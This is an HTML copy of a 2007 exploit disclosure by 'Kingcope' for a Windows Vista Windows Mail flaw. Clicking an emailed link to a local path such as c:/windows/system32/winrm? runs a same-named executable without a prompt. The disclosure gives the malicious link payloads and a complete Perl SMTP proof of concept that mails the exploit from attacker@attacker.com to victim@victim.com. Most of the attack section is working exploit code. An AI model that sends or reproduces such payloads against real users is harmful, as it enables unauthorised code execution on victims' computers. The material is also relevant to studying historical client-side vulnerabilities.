<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.6000.16386" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff><FONT face=Arial size=2>
<DIV><BR>Microsoft Windows Vista - Windows Mail Client Side Code Execution
Vulnerability<BR>Successfully Tested on Windows Vista Ultimate</DIV>
<DIV> </DIV>
<DIV>Greetings fly out to Alex,wtfomg,Thierry,Andi and Blackzero</DIV>
<DIV> </DIV>
<DIV>Description<BR>Windows Mail is the default Mail Client of Microsoft Windows
Vista.</DIV>
<DIV> </DIV>
<DIV>Vulnerability<BR>Remote Code Execution is possible if a user clicks on a
malicious prepared link.<BR>Vistas Mail Client will execute any executable file
if a folder exists with the same name.<BR>For example the victim has a folder in
C:\ named blah and a batch script named blah.bat<BR>also in C:\. Now if the
victim clicks on a link in the email message with the URL target<BR>set to
C:\blah the batch script is executed without even asking.<BR>There is for
example a CMD script by default in C:\Windows\System32\ named winrm.cmd<BR>(and
also a folder named winrm inside System32).</DIV>
<DIV> </DIV>
<DIV>Exploit:<BR>Send a HTML email message containing the URL:<BR><a
href="c:/windows/system32/winrm?">Click here!</a><BR>or<BR><a
href="c:/windows/system32/migwiz?">Click here!</a><BR>and
winrm.cmd/migwiz.exe gets executed without asking for permission.<BR>These are
just examples.</DIV>
<DIV> </DIV>
<DIV>I could not pass arguments to winrm (hehe this would be beautiful), but I
guess there<BR>are several attack vectors.</DIV>
<DIV> </DIV>
<DIV>Proof of Concept<BR>---snip---<BR>use Net::SMTP_auth;<BR>$smtp =
Net::SMTP_auth->new('smtp.1und1.de', Debug => 1);</DIV>
<DIV> </DIV>
<DIV>$smtp->auth('PLAIN', 'username',
'password');<BR>$smtp->mail("attacker\@attacker.com");<BR>$smtp->to("victim\@victim.com");</DIV>
<DIV> </DIV>
<DIV>$msg = "Subject: Vista Remote Code Exec\r\n"<BR>."From:
attacker\@attacker.com\r\n"<BR>."To: victim\@victim.com\r\n"<BR>."MIME-Version:
1.0\r\n"<BR>."Content-Type: text/html\r\n\r\n<a
href=\"c:/windows/system32/winrm?\">Click
here!</a>";<BR>$smtp->data();<BR>$smtp->datasend("$msg\n");<BR>$smtp->dataend();<BR>$smtp->quit;<BR>---snip---</DIV>
<DIV> </DIV>
<DIV><BR>Signed,</DIV>
<DIV> </DIV>
<DIV>Kingcope / kingcope[at]gmx.net / 2007<BR></FONT></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV></BODY></HTML>